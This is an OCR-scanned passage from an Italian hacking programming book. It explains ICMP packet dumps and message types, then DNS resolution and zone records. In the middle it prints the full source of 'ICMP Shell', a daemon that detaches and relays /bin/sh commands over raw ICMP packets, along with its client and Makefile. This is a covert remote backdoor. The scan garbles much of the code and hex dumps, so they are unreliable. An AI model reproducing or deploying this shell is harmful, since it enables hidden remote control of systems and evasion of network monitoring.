0000 


.n. .E. . 


\ .3": . . . 


48: 


42ac 


0809 


OaOb 


OcOd 


OeOf 


1011 


1213 


1415 


B 




64: 


1617 


1819 


lalb 


lcld 


lelf 


2021 


2223 


2425 




. . . .' "§$% 


80: 


2627 


2829 


2a2b 


2c2d 


2e2f 


3031 


3233 


3435 


& ' () *+, 


-./ 012345 


96: 


3637 





















La decodifica invece è la seguente : 



ETHER 


Ether Header 


ETHER 




ETHER 


Packet 9 arrived at 17:37:31.08 


ETHER 


Packet size = 60 bytes 


ETHER 


Destinatlon = 8 : 0 : 20 : 86 : 35 : 4b, Sun 


ETHER 


Source = 0 : eO : f7 : 26 : 3f :e9, CISCO Router 


ETHER 


Ethertype = 0800 (IP) 


ETHER 




IP 




IP Header 


IP 






IP 




Ver sion = 4 


IP 




Header length = 20 bytes 


IP 




Type of service = 0x00 (normal) 


IP 




Total length = 40 bytes 


IP 




Identification = 43774 


IP 




Flags = 0x0 


IP 




.0 = may fragment 


IP 




. .0 = last fragment 


IP 




Fragment offset = 0 bytes 


IP 




Time to live = 252 seconds/hops 


IP 




Protocol = 6 (TCP) 


IP 




Header checksum = 3a55 


IP 




Source address = 139 .133 .233 .2 , server.abdn.ac.uk 


IP 




Destination address = 139 . 133 .217 . 110 , client 
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IP: 


No options 


IP: 




TCP 


TCP He ade r 


TCP 




TCP 


Source port = 23 


TCP 


Destlnation port = 36869 


TCP 


Sequence number = 2486243368 


TCP 


Acknowledgement number = 1913975089 


TCP 


Data offset = 20 bytes 


TCP 


Flags = 0x10 


TCP 


. .0 = No urgent pointer 


TCP 


... 1 .... = Acknowledgement 


TCP 


.... 0. . . = No push 


TCP 


0 . . = No reset 


TCP 


0 . = No Syn 


TCP 


0 = No Fin 


TCP 


Window = 8760 


TCP 


Checksum = Oxl c 64 


TCP 


Urgent pointer = 0 


TCP 


No options 


TCP 





La risposta data da ECHO REPLY invece è : 



0: 


0800 


2086 


354b 


OOeO 


f726 


3fe9 


0800 


4500 


.. .5K. 


.^&?. . .E. 


16: 


0054 


aafb 


4000 


fcOl 


fa30 


8b85 


e902 


8b85 


.T.ù@.u 


.ÙO 


32: 


d96e 


0000 


45da 


le60 


0000 


335e 


3ab8 


0000 


.n. .E. . 


\ .3 A : . . . 


48: 


42ac 


0809 


OaOb 


OcOd 


OeOf 


1011 


1213 


1415 


B 




64: 


1617 


1819 


lalb 


lcld 


lelf 


2021 


2223 


2425 




. . . .' "#$% 


80: 


2627 


2829 


2a2b 


2c2d 


2e2f 


3031 


3233 


3435 


& ' 0 *+, 


-./ 012345 


96: 


3637 
















67 





la cui decodifica è : 



ETHER : Ether He ade r 

ETHER : 

ETHER: Packet 2 arrived at 17:37:12.02 

ETHER: Packet size = 98 bytes 

ETHER: Destination = 8 : 0 : 20 : 86 : 35 : 4b, Sun 

ETHER: Source = 0 : eO : f7 : 26 : 3f :e9, CISCO Router 

ETHER: Ethertype = 0800 (IP) 

ETHER: 

IP: IP Header 

IP: 

IP: Ver sion = 4 

IP: Header length = 20 bytes 

IP: Type of service = 0x00 (normal) 

IP: Total length = 84 bytes 

IP: Identification = 43771 

IP: Flags = 0x4 

IP : .1 = do not fragment 

IP: . .0 = last fragment 

IP: Fragment offset = 0 bytes 

IP: Time to live = 252 seconds/hops 

IP: Protocol = 1 (ICMP) 

IP: Header checksum = fa30 

IP: Source address = 139 .133 .233 .2 , server.abdn.ac.uk 
IP: Destination address = 139 . 133 .217 . 110 , client 
IP: No options 
IP: 

ICMP: ICMP Header 

ICMP : 
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ICMP: Type = 0 (Echo reply) 
ICMP: Code = 0 
ICMP: Checksum = 45da 
ICMP: Payload Data 

Viste le due funzionalità più importanti che è possibile creare tramite la richiesta di ECHO 
vediamo ora gli altri tipi. 



• Destination Enreachable (3) 

0 8 16 24 31 



Unused (zero) 



IP Header + 64 bits of data of the datagram 



Se questo messaggio è ricevuto da un router intermediario significa che questo considera 
l'host di destinazione come irraggiungibile. 

Abbiamo già riportato nella tabella all'inizio i valori che il codice dell'header ICMP. 
In ogni caso i valori sono i seguenti : 



0 


Network unreachable 


1 


Host unreachable 


2 


Protocol unreachable 


3 


Port unreachable 


4 


Fragmentation needed, but the Don't Fragment bit has been set 


5 


Source route failed 


6 


Destination network unknown 


7 


Destination host unknown 


8 


Source host isolated (obsolete) 


9 


Destination network administratively prohibited 


10 


Destination host administratively prohibited 


11 


Network unreachable for TOS 


12 


Host unreachable for TOS 


13 


Communication administratively prohibited by filtering 


14 


Host precedence violation 







Se un router implementa il protocollo PATH MTU DISCOVERY, il formato del messaggio di 
destinazione irraggiungibile è cambiato per includere il MTU del link che non accetta il 
datagramma. 

Source Quench (4) 



16 



24 



31 



Unused (zero) 



IP header + 64 bits of originai data of the datagram 



Se questo messaggio è ricevuto da un router intermediario significa che questo non possiede 
un buffer necessario per accodare il datagramma in uscita per il segmento di rete successivo. 
Se il messaggio è invece ricevuto da un host di destinazione significa che il datagramma in 
ingresso è ricevuto troppo rapidamente per essere processato. 

Redirect (5) 



_8_ 



Router IP address 



_24_ 



_31 



IP header + 64 bits of originai data of the datagram 
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Se il messaggio è ricevuto da un router intermediario significa che l'host dovrà inviare i 
successivi datagrammi all'indirizzo specificato nel messaggio ICMP. 

Questo router preferenziale deve essere sempre nella stessa sottorete dell'host che spedisce 
il datagramma e del router che restituisce I' IP. 

Il router dovrà spedire il datagramma alla successiva destinazione HOP 

Se l'indirizzo IP del router è lo stesso del datagramma originale significa che è in corso un 

loop. 

Questo messaggio ICMP non deve essere spedito se contiene un route sorgente. 
Il campo codice dell'header ICMP deve contenere uno dei seguenti valori. 



0 Network redirect 

1 Host redirect 

2 Network redirect for this type of service 



Router Advertisement (9) and Router Sollecitation (1 0) 



I messaggi 9 e 10 sono opzionali. 

Questi sono descritti nell'ambito del RFC 1256 il quale è elettivo. 



number 



Entry lenght 



TTL 



Router address 



Preference level 



Router address n 



Preference level n 



Unused (zero) 



Il numero è appunto il numero di ingressi dentro al messaggio ovvero il numero di righe da 32 
bits. 

Normalmente è 2 ovvero 32 bits per l'indirizzo IP e 32 bits per il valore della preferenza. 
Il TTL è il numero di secondi relativi alla validi6tà del messaggio. 
Il router address chiaramente è l'indirizzo IP di chi invia. 

Il preference address invece è un valore signed che indica la preferenza che deve essere 
assegnata al'indirizzo quando si esegue la selezione di default di un router per una sottorete. 
Ogni router in una sottorete è responsabile di avvisare questa relativamente al suo valore 
preferenziale. 

Valori più grossi implicano una preferenza maggiore mentre valori più piccoli una preferenza 
minore. 

Il valore di default è ZERO il quale è il valore di mezzo tra quelli possibili. 

Un valore uguale a x80000000 (-2elevato31 ) indica che il router non deve mai essere 

utilizzato come default. 
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Questi due messaggi vengono utilizzati se un host o un router supportano un protocollo per 
la scoperta dei router (discovery protocol). 

L'utilizzo in multicasting è consigliato ma è possibile utilizzare anche messaggi in 
broadcasting nel caso in cui se il primo metodo non è supportato da una determinata 
interfaccia. 

I routers periodicamente avvertono i loro IP sulla sottorete dela loro capacità di essere 
configurati per fare questo. 

Time Exceeded (11) 



Unused (zero) 



IP header + 64 bits of originai data of the datagram 



Se questo messaggio è ricevuto da un router intermedio, significa che il campo time-to-live di 
un datagramma di un Ip è scaduto. 

Parameter Problem (12) 



pointer 


Unused (zero) 


IP header + 64 bits of originai data of the datagram 



Indica che si è verificato un problema processando i parametri dentro all'header IP. 
Il campo pointer punta ai bytes del datagramma IP dove è stato riscontrato il problema. 
Il campo CODE dell'header ICMP può assumere uno dei seguenti valori. 

0 unespected error 

1 required optino missing 

Time stamp Request (13) and Time Stamp Reply (14) 



identifier 



Sequenze number 



Originate timestamp 



Receive timestamp 



Trasmit timestamp 



Esistono due messaggi per la misura delle performance e per il debugging. 
Questi non vengono usati per la sincronizzazione dei clock. 

Information request (15) and Information Reply (16) 



identifier 



Sequenze number 
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Il comando viene utilizzato per richiedere l' indirizzo IP di un network collegato. 
Address Mask Request (17) and Address Mask Reply (18) 



identifier 


Sequenze number 


Subnet address mask 



Ache questo messaggio serve a ricevere l'address MASK di una sottorete collegata. 
Il protocollo ICMP può essere anche utilizzato per la creazione di un sistema di SHELL. 
I sorgenti di questa shell sono quelli che seguono. 



Il file di compilazione MAKEFILE. 



CC = gec 








CFLAGS1 


= -02 


-Wall 






CFLAGS2 


= -02 


-Wall -lsocket 






STRIP = 


strip 








de fault 












@echo 


n il 








@echo 


"Make with the OS from the list : " 








@echo 


If If 








@echo 


"1.) linux" 








@echo 


"2.) bsd" 








@echo 


"3.) solaris" 








@echo 


If If 








@echo 


"ex: make bsd" 








@echo 


n 11 






clean : 












/bin/rm -f isti ishd 






linux: 


clean 


ccl fin 






bsd: 


clean 


ccl fin 






solaris 




clean cc2 fin 






ccl : 












$(CC) 


$(CFLAGS1) -0 ish ish.c ish_main.c 








$(CC) 


$ (CFLAGS1) -0 ishd ishd.c ish_jaain 


c ish_ 


open . c 


cc2: 












$(CC) 


$ (CFLAGS2) -0 ish ish.c ish_main.c 








$(CC) 


$ (CFLAGS2) -0 ishd ishd. c ish_jnain 


c ish_ 


open . c 


fin: 












$ (STRIP) ish 







Il file ISSHELL.H 

iifndef i_shell_h 

idefine i__shell_h 

iinclude <stdio.h> 
iinclude <stdlib.h> 
iinclude <string.h> 
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iinclude <signal.h> 
iinclude <errno.h> 
iinclude <sys/types . h> 
iinclude <sys/select . h> 
iinclude <sys/stat.h> 
iinclude <sys/wait . h> 
iinclude <sys/time . h> 
iinclude <sys/socket . h> 
iinclude <netinet/in . h> 
iinclude <netinet/in_systm. h> 
iinclude <netinet/ip . h> 
iinclude <netinet/ip_icmp . h> 
iinclude <fcntl.h> 
iinclude <netdb.h> 






struct ish_hdr { 

uintl6_t entri; 
uint32_t ts; 

}; 


/* ish flag control 
/* timestamp when sent 


*/ 
*/ 


struct ish_track { 
uintl6__t id; 
uint8_t type; 
uintl6_t packetsize; 
uint32_t seq; 

}; 


/* ish id 

/* iemp type to send packet as 

/* packetsize of data 

/* sequence number tracking 


*/ 
*/ 
*/ 
*/ 


idefine VERSION "0.2" 


/* ishell version 


*/ 


iifndef MAX 

idefine MAX (a,b) ( (a) > (b) ? (a) : (b) ) 
iendif 




idefine CNTRL_CEXIT 1 
idefine CNTRL_CPOUT 2 


/* client exited 

/* client packet out 


*/ 
*/ 


/* function prototypes */ 
int popen2 (const char *) ; 
int pclose2 (int) ; 






int ish send (int , char *, 
int ish__recv (int, char *, 


struct sockaddr * , socklen_t) ; 
struct sockaddr * , socklen_t) ; 




void error_msg (void) ; 

u_short in__cksum (u short *, int); 




/* global variables */ 

extern struct ish_track ish__info; 

extern struct ishhdr sendhdr; 





Ora invece è il file ishd ce 



iinclude "ishell. h" 

/* global variables */ 
int ish_debug = 1; 

/* function prototypes */ 
void usage (char *) ; 
void sig_handle (int) ; 
int edaemon (void) ; 

int ish_listen (int, struct sockaddr *, socklen_t) ; 

void 

usage (char *program) { 
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fprintf (stderr, 
ICMP Shell vis (server) 
usage: %s [optlons]\n\n" 
options: \n" 

-h 

-d 

-1 <ld> 

-t <type> 

-p <packetsize> 
\nexample : \n " 
%s -i 65535 -t 0 



by: Peter Kieltyka\n" 



Display this screen\n" 
Run server in debug mode\n " 

Set session id; range: 0-65535 (default: 1515) \n" 
Set ICMP type (default: 0)\n" 
Set packet size (default: 512)\n" 



-p 1024\n" 
\n ", VERSION, program, program) ; 



exit (-1) ; 

} 

void 

sig_handle (int empty) { 
return; 

} 

int 

edaemon (void) { 
pid_t pid; 
int fd; 

if((pid = fork()) < 0) { 

return -1; 
} else if(pid != 0) ( 

exit (0) ; 

} 

setsid() ; 
chdir ("/") ; 
umask ( 0) ; 

if((fd = open("/dev/null", 0_WRONLY, 0) ) == -1) 
return -1; 

dup2 (fd, STDIN__FILENO) ; 
dup2 (fd, STDOUT_FILENO) ; 
dup2 (fd, STDERR_FILENO) ; 

dose (fd) ; 

return 0; 

} 

int 

ish li sten (int sockfd, struct sockaddr *sin, socklent sinlen) { 
fd_set rset; 
int n, fd, maxfd; 

char send_buf [ish_info .packetsize ] , recv_buf [ish__info. packet size ] ; 

fd = popen2 ( "/bin/sh ") ; 
sendhdr . entri = 0; 

while(l) { 

FD_ZERO (Srset) ; 

FD_SET (fd, Srset ) ; 
FD_SET (sockfd, Srset ) ; 
maxfd = MAX(fd, sockfd) + 1; 

select (maxfd, Srset, NULL, NULL, NULL) ; 

if (FD_ISSET (sockfd, Srset)) { 

memset (recv_buf, 0, sizeof (recv_buf) ) ; 

if (ish_recv (sockfd, recv_buf, sin, sinlen) == CNTRL__CPOUT) { 
write(fd, recv_buf, strlen (recv_buf) ) ; 



fprintf (stderr, " + IN DATA + \n%s" / recv_buf) ; 

) 

} 
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memset (send_buf, 0, sizeof (send_buf) ) ; 

sendhdr.ts = 0; 
ish_info . seq++; 

if ( (n = readffd, send_buf, sizeof (send__buf) -1) ) == 0) 
sendhdr . entri /= CNTRL_CEXIT; 

fprintf(stderr, " + OUT DATA + \n%s\n", send_buf) ; 

if (ish_send (sockfd, send_buf, sin, sinlen) < 0) 
error_msg () ; 

if(n == 0) break; 

} 

} 

pclose2 (fd) ; 
return (0) ; 

} 

int 

mainfint arge, char *argv[]) { 
int opt, sockfd; 

struct sockaddr__in sin; 

while((opt = getopt (arge, argv, "hdi :t :p: ")) != -1) { 
switch(opt) { 
case 'h ' : 

usage (argv[0] ) ; 
break; 

case ' d ' : 

ish_debug = 0; 
break; 

case ' i ' : 

ish_info.id = atoi (optarg) ; 
break; 

case ' t ' : 

ish_info . type = atoi (optarg) ; 
break; 

case 'p ' : 

ish_info .packetsize = atoi (optarg) ; 
break; 

} 

} 

if (ish_debug) { 

if (edaemon() != 0) { 

fprintf (stderr, "Cannot start server as daemon !\n") ; 
exit (-1) ; 

} 

} 

sin . sin_family = AF_INET; 
memset (& (sin . sin_zero) , 0, 8); 

if ( (sockfd = socket (AF_INET , SOCK_RAW, IPPROTO_ICMP) ) == -1) 
error_msg () ; 

signal (SIGPIPE, sig_handle) ; 

while (ish_listen (sockfd, (struct sockaddr *)Ssin, sizeof (sin)) == 0) ; 



dose (sockfd) ; 




I SH_OPEN.C 

^include "ishell.h 



iifndef OPEN_MAX 
idefine OPEN_MAX 1024 
iendif 
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int 

popen2 (const char *commandstring) { 
int i, fds[2]; 
pid_t pid; 

if(childpid == NULL) 

if( (childpid = calloc (OPEN_MAX, sizeof (pid__t) ) ) == NULL) 
return -1; 

if (socketpair (AF_UNIX, SOCK_STREAM, 0, fds) == -1) 
return -1; 

if((pid = fork()) < 0) 

return -1; 
else if(pid == 0) { 

dose (fds[l]) ; 

if(fds[0] != STDIN_FILENO) { 

dup2 (fds [0] , STDIN^FILENO) ; 
dose (fds[0]) ; 

} 

dup2 (STDIN_FILENO, STDOUT_FILENO) ; 
dup2 (STDOUT_FILENO, STDERR_FILENO) ; 

for(i = 0; i < OPEN_MAX; { 
if (childpid [i] > 0) 
dose (i) ; 

} 

exed ("/bin/sh", "sh", "-c", commandstring, NULL); 
_exit (127) ; 

} 

dose (fds[0]> ; 
childpid [ fds [1]] = pid; 
return (fds [1 ] ) ; 

} 

int 

pclose2 (int fd) { 
int stat; 
pid_t pid; 

if (childpid == NULL) 
return —1; 

if (childpid [fd] == 0) 
return -1; 

dose (fd) ; 

pid = childpid[fd] ; 

while (waitpid (pid, Sstat, 0) == —1) 
if(errno != EINTR) 
return -1; 

return (stat) ; 

} 



I SH_MAI N.C 

iinclude "ishell.h" 

struct ish_track ish^info = { 

1515, /* ish id */ 

0, /* icmp type to send packet as */ 

512 /* packetsize */ 

}; 

struct ish_hdr sendhdr; 
int 

ish_send(int sockfd, char *send__buf, struct sockaddr *sin, socklen t sinlen) { 

int datalen = sizeof (struct icmp) + sizeof (struct ish^hdr) + strlen (sendbuf) ; 

char datagram [datalen] ; 
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char *data = datagram + sizeof (struct icmp) + sizeof (struct ish_hdr) ; 
struct icmp *±cmph = (struct icmp *) datagram; 

memset (datagram, 0, sizeof (datagram) ) ; 

memcpy(data, send_buf, strlen (aendjmf) ) ; 
memcpy(ish, Ssendhdr, sizeof (struct ish_hdr) ) ; 

icmph—>icmp_type = ish_info.type; 
icmph—>icmp__code = 0; 
icmph—>icmp id = isti info, id; 
icmph—>icmp seq = isti info, seq; 
icmph->icmp_cksum = 0; 

icmph—>icmp_cksum = incksum ( (u__short *) datagram, datalen) ; 

if (sendto (sockfd, datagram, datalen, 0, sin, sinlen) < 0) 
return (-1) ; 

return (0) ; 



} 



int 

ish_recv (int sockfd, char *recv_buf, struct sockaddr *sin, socklen t sinlen) { 
int datalen = ish_info .packetsize + sizeof (struct ip) + 

sizeof (struct icmp) + sizeof (struct ish__hdr) ; 

int n; 

char datagram [datalen] ; 

struct icmp *icmph = (struct icmp *) (datagram + sizeof (struct ip) ) ; 

struct ish_hdr *recvhdr = (struct ish hdr *) (datagram + sizeof (struct ip) + 
sizeof (struct icmp) ) ; 

char *data = datagram + sizeof (struct ip) + sizeof (struct icmp) + 

sizeof (struct ish_hdr) ; 

memset (datagram, 0, sizeof (datagram) ) ; 

n = recvfrom (sockfd, datagram, sizeof (datagram) , 0, sin, Ssinlen) ; 

if (icmph—>icmp_id != ish info, id) 
return (-1) ; 



if(recvJouf != NULL) { 

memset (recv_buf, 0, sizeof (recv_buf) ) ; 
memcpy (recv_buf , data, strlen (data) ) ; 

} 

if (recvhdr->cntrl S CNTRL_CEXIT) 

return (CNTRL_CEXIT) ; 
else if (recvhdr->cntrl S CNTRL_CPOUT) 

return (CNTRL^CPOUT) ; 

return (0) ; 

} 

void 

errormsg ( voi d) { 

fprintf ( stderr, "Error : %s.\n", strerror ( ermo) ) ; 
exit (-1) ; 

} 

/* This function is taken from the public domain version of Ping */ 
unsigned short 

in_cksum (unsigned short *addr, int len) { 
int nleft = len; 

int sum — 0; 

unsigned short *w = addr; 
unsigned short answer = 0; 

/* 

* Our algorithm is simple, using a 32 bit accumulator (sum), we add 

* sequential 16 bit words to it, and at the end, fold back ali the 

* carry bits from the top 16 bits into the lower 16 bits. 
*/ 

while (nleft > 1) { 



sum += *w++; 




Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



/* 4mop up an odd byte, if necessary */ 
if(nleft == 1) { 

* (unsigned char *) (Sanswer) = * (unsigned char *)w ; 

sum += answer; 

} 

/* 4add back carry outs from top 16 bits to low 16 bits */ 
sum = (sum » 16) + (sum S Oxffff); /* add hi 16 to low 16 */ 
sum += (sum » 16); /* add carry */ 

answer = ~sum; /* truncate to 16 bits */ 

return (answer) ; 



I SH.C 



iinclude "ishell.h" 

/* function prototypes */ 
void usage (char *) ; 
void ish_timeout (int) ; 

int ish _prompt (int, struct sockaddr *, socklen_t) ; 
void 

usage (char *program) { 
fprintf (stderr, 

"ICMP Shell vis (client) - by: Peter Kieltyka\n" 
"usage: %s [options] <host>\n \n " 
"options : \n" 

" -i <id> Set session id; range: 0-65535 (default: 1515) \n" 

" -t <type> Set ICMP type (default: 0)\n" 

" ~P <packetsize> Set packet size (default: 512)\n" 

" \nexample :\n" 

"%a -i 65535 -t 0 -p 1024 host.com\n" 
"\n", VERSION, program, program); 

exit (-1) ; 

} 

void 

ish_timeout (int empty) { 
printf("failed. \n\n") ; 
exit (-1) ; 

} 

int 

ishprompt (int sockfd, struct sockaddr *sin, socklen t sinlen) { 
fd_set rset; 
int n, maxfd; 

char send_buf [ish__info . packetsize ] , recv_buf [ish_info . packetsize ] ; 

while(l) { 

FD_ZERO (Srset) ; 

FD_SET (STDIN_FILENO, Srset ) ; 
FD_SET (sockfd, Srset ) ; 

maxfd = MAX (STDIN_FILENO, sockfd) + 1; 

select (maxfd, Srset, NULL, NULL, NULL) ; 

if (FD_ISSET (sockfd, Srset)) { 

memset (recv_buf, 0, sizeof (recv_buf) ) ; 

n = ish recv (sockfd, recv_buf, sin, sinlen) ; 

if(n == 0) 

fprintf (stdout, "%s", recv_buf) ; 
else if(n == CNTRL_CEXIT) 

exit (0) ; 

} 
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read (STDIN_FILENO, send_buf, sizeof (send__buf) ) ; 

if (ish_send (sockfd, send_buf, sin, sinlen) < 0) 
error_msg () ; 

; 

int 

mainfint argc, char *argv[]) { 
int sockfd; 
char *host, opt; 
struct sockaddr__in sin; 
struct hostent *he; 

if (argc < 2) 

usage (argv[0] ) ; 

while((opt = getopt (argc, argv, "i:t:p: ") ) != -1) { 
switch (opt) { 
case ' i ' : 

ish_info.id = atoi (optarg) ; 
break; 

case ' t ' : 

ish_info . type = atoi (optarg) ; 
break; 

case 'p ' : 

ish_info .packetsize = atoi (optarg) ; 
break; 

de fault : 

usage (argv[0] ) ; 
break; 

} 

} 

host = argv [ argc-1 ] ; 

if ( (he = gethostbyname (host) ) == NULL) { 

fprintf (stderr, "Error: Cannot resolve %s!\n", host); 
exit (-1) ; 

} 

sin . sin_family = AF_INET; 

sin.sin_addr = *( (struct in_addr *)he->h addr) ; 
memset (& (sin . sin__zero) , 0, 8); 

if ( (sockfd = socket (AF_INET, SOCK_RAW, IPPROTO_ICMP) ) == -1) 
error_msg () ; 

sendhdr . entri = 0; 

sendhdr. entri /= CNTRL_CPOUT; 

printf("\nICMP Shell vis (client) - by: Peter Kieltyka\n", VERSION) ; 

printf(" \n"); 

printf ("\nConnecting to %s...", host); 

setvbuf (stdout , NULL, _IONBF, 0) ; 
fflush (stdout) ; 

if (ish_send (sockfd, "id\n", (struct sockaddr *)&sin, sizeof (sin) ) < 0) { 
printf ("failed. \n\n ") ; 
error_msg () ; 

} 

signal (SIGALRM, ish__timeout) ; 
alarm(lO) ; 

if (ish recv (sockfd, NULL, (struct sockaddr *)&sin, sizeof (sin)) < 0) { 
printf ( "failed. \n\n ") ; 
error_msg () ; 

} 

alarmf 0) ; 

printf ( "done . \n\n") ; 
printf ("i "); 
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dose (sockfd) ; 
exit (0) ; 

} 

I I DNS 

Almeno una volta a qualsiasi persona che ha navigato gli sarà venuto da chiedersi come è 
possibile che semplicemente clickando con il mouse su un link questo sistema venga 
raggiunto e quindi le pagine presenti sul server caricate nel browser e visualizzate. 
Precedentemente abbiamo parlato delle funzioni di routing le quali permettono alla rete di 
instradare i pacchetti da un sistema mittente verso uno di destinazione utilizzando il protocollo 
IP. 

Questo di fatto spiega il meccanismo a basso livello che gestiscono le strade telematiche 
però di fatto non sono in grado di dirci nulla sul meccanismo che permette di trasformare il 
nome di un host specificato come siamo abituati a digitarlo nel nostro browser in un IP 
numerico. 

Questo meccanismo è appunto gestito da quello che viene definito con il termine di DNS 
ovvero Domain Name System. 

Anche in questo caso abbiamo a che fare con un protocollo descritto negli RFC1034 e 
RFC1035. 

Prima di descrivere in modo più dettagliato il protocollo voglio provare a spiegarlo con poche 
parole semplici. 

In pratica quando nel nostro browser o ovunque ci interessa specificare un URL digitiamo il 
suo nome letterale il sistema prende quello che viene definito con il termine di fully qualified 
domain names (FQDNs) che è costituti dal nome del host, da quello del dominio e che 
termina con punto (.). 

In pratica il sistema di gestione è di tipo gerarchico ovvero alla base di tutto esiste quella che 
viene definita con il termine di radice ovvero il punto. 

Da qui si origina la rete il cui meccanismo di rintracciamento di un IP è simile alla struttura di 
un albero di directory del nostro disco. 

Quando digitate sul browser www.crackinguniversity2000.it e battete invio che cosa fate ? 

Detto in poche parole, se attivo, vi collegate al sistema di cracking university. 

Volendo andare a vedere bene quando premete l'invio scatenate una catena di funzioni su 

diversi sistemi, quelli che permetto l'identificazione di un certo sito sulla rete pubblica di 

internet. 

Dopo tanti articoli dedicati alla programmazione e al cracking voglio dedicare qualche ora a 
parlare di un argomento che con i tempi che corrono potrete battergli la stesa contro e che 
comunque in ogni caso ritengo interessante da conoscere in quanto di fatto e' il meccanismo 
di internet. 

Sulla rete pubblica esistono un infinità di sistemi per cui il raggiungimento di uno di questi 
tramite solo la specifica del nome e' comunque frutto di un meccanismo di risoluzione molto 
complesso. 

Tutti i sistemi appartenenti ad internet devono essere visti come se fossero le foglie di un 
albero tipo quello delle directory nei nostri sistemi. 

I pratica esiste un origine di questo albero che viene rappresentato dal punto ( . ). 
Questo punto di origine viene gestito da interNic. 

A partire da questo punto paragonabile alla root di un sistema ad albero partoino diverse 
foglie che sono in pratica i vari .com, .it, .org,. net ecc. 
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Application 
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i 










1 




Resolver | 



s. 



J 




query f or addres f of akx.firm.be 




referrai to be domain name server ^ 


Marne 


4 

query for address of alcx.firm.be ^ 


Server 


referrai to be domain name server 


c. 


4 

query for addreff of alex.firm.be 




IP addres s of akx.firm.be 










rooT 
Marne Server 



Ee 

Marne Server 



nrm.De 
Marne Server 



Se vogliamo rappresentare graficamente la struttura gerarchica della soluzione DNS su 
internet dovremmo vederla come : 




Quando specifichiamo un indirizzo web il sistema parte con la ricerca dall'origine e poi in 
base al .com, .it o quello che e' la risoluzione viene inviata ai server specifici di quella zona. 
Esiste un utility che facilita la comprensione, e anche il settaggio e il controllo, delle zone di 
DNS. 



rari 



| coro | j net | j org | j int j j | g | 



Generic World Wide Domains 



rriiT "| 1 1 aIi | - | Js | - | ZW i | 



! Generic US only i Country 



i i i 



3 



States 



Chiaramente bisogna capire che se lo scopo di tutta la struttura è quello di mappare un 
indirizzo specificato in modo verboso in un indirizzo IP, ci dovranno essere nell'ambito di tutto 
il sistema dei servers attivi su cui verranno eseguite le ricerche. 
Parlavo dell'utility la quale si chiama nslookup. 

Lanciando questa da linea di comando di Windows o di Linux il programma partendo ci 
avviserà di quale server e' settato di default per soddisfare le nostre richieste. 
Facciamo un prova resettando tutto in questo modo. 

Lanciamo nslookup e settiamo il modo di interrogazione dicendogli che ci interessa avere 
come risposte in name server. 
In pratica una volta partito diremo : 



A questo punto richiediamo quali server si interessano di risolvere ad esempio i sistemi dei 
.com. 

Specifichiamo appunto 
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y com. 
Fate attenzione del punto terminale. 

Dopo aver dato l'invio ci verrà mostrato un serie di nomi di server i quali, come ho detto 
prima, sono quelli che si interesseranno di risolvere i .com (in questo caso). 
Una volta avuta questa lista selezioniamone uno e diciamo a nslookup che vogliamo usare 
questo per risolvere il nostro indirizzo relativo a un sistema .com ad esempio websitek.com 
Il settaggio del server di default viene fatto specificando : 

y server A . ROOT-SERVERS . NET 

A questo punto richiedendo il nome completo del dominio che ci interessa avremo la risposta 
data dall'interrogazione di questo server specificato. 
In altre parole l'interrogazione totale avverrà con : 



I risulato sarà del tipo : 

Server : a . root -server s . net 
Address: 192.33.4.12 

Non-authoritative answer: 

websitek . com nameserver = dns . interbusiness . it 
websitek.com nameserver = dns.nic.it 

Authoritative answers can be found from: 
dns.interbusiness.it internet address = 18.70.0.160 
dns.nic.it internet address = 18.72.0.3 

Ora avrete capito che qualsiasi interrogazione avviene a partire dalla radice, il punto in 
alto, per poi passare sui server che gestiscono i vari .com ecc. per infine giungere al 
vostro sistema. 

In pratica i vostri sistemi faranno parte di un dominio che voi preventivamente dovrete 
registrare presso il NIC. 

Ad esempio noi di websitek.com srl abbiamo richiesto diversi domini tra cui 
websitek.com, websitek.it, crackinguniversity2000.it ecc. 

Nell'sitante in cui il NIC ci ha confermato la registrazione noi abbiamo dovuto inviare una 
lettera in cui specificavamo quale IP pubblico sarebbe servito a identificare sulla rete il 
nostro dominio. 



NIS 
ila ve Server 



1 



aient 



m 

Ma iter Server 



NIS Rcqucsts 



MapTranffcrf 



MI! 
Slave Server 



Qlent 



aient 



aient 



All'interno di questo dominio e' possibile creare delle zone. 

Le zone sono porzioni contigue dello spazio del nome del DNS il quale cntiene una serie 
di records memorizzati su un server DNS. 

A parte la strutturazione fisica degli IP ella rete quando eseguiamo una progettazione di 
un sistema che dovrà offrire servizi anche su internet, dovremo anche eseguire un 
progettazione logica delle varie funzionalità che vorremmo avere nell'insieme dei sistemi. 
In pratica vediamo il dominio come se fosse il contenitore di certi gruppi funzionali. 
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In questo dominio potremo trovare degli host i quali si interesseranno a svolgere certi 
compiti, dei mailsever, degli aliases e dei nameserver. 
Ad esempio prendiamo il dominio websitek.it 

Dentro a questo dominio esiste un host collegato all'IP 212.210.165.131 chiamato dns. 
Questo sistema gli verrà', dentro ai file di gestione del DNS, attribuito l'indirizzo che 
abbiamo apena visto. 

Specificato nel formato corretto dei vari file (vedremo meglio il tutto tra poco) avremo una 
cosa del tipo : 

dns. A 212.210.165.131 

dove A sta per address. 

Nel dominio websitek.it la specifica del nameserver, ovvero il server utilizzato per la 
risoluzione degli indirizzi, si avrà' con : 

NS dns.websitek.it. 

In pratica NS sta appunto per nameserver. 

La specifica MX sta per mail server per cui noi potremmo definire sempre allo stesso 
indirizzo un host mail con : 

mail. A 212.210.165.131 

e poi specificare il record del mailserver con 

MX mail.websitek.it. 
Ad esempio per noi il dominio e' appunto websitek.it 

Quando vuoi arrivate a noi tramite www.websitek.it e' perche' dentro alla specifica del 
nostro dns abbiamo detto che www e' un host che corrisponde a un certo indirizzo. 
In pratica abbiamo fatto : 

www A 212.210.165.131 

per cui quando voi dite appunto www.websitek.it e' come se diceste l'host www del 
dominio websitek.it 

In altre parole il sistema di ricerca partirebbe dal . della root e cercherebbe quali sono i 
server che gestiscono la zona .it. 

Avuta questa risposta verrebbe ricercato su uno di questi server (dns.nic.it e' uno di 
questi) il dominio websitek. 

Il sistema dopo aver trovato quale nameserver di websitek.it gli passerebbe la palla per 
cercare di risolvere il tutto. 

La sequenza di ricerca sarebbe cosi . it . websitek . www 

Una volta arrivati al nameserver di websitek questo cercherebbe di risolvere il www per 

cui dato che esiste la specifica di indirizzo manderebbe a questo il tutto. 

I name server sono di fatto i server di fiducia per la zona specifica. 

Fino adesso abbiamo parlato in generale no dicendo quali sono i files in cui vengono 

gestiti i DNS. 

Esiste il file named.conf il quale contiene i dati generali del dominio )o dei domini). 

options { 

directory " /var/named" ; 

}; 

zone "." { 

type hint; 

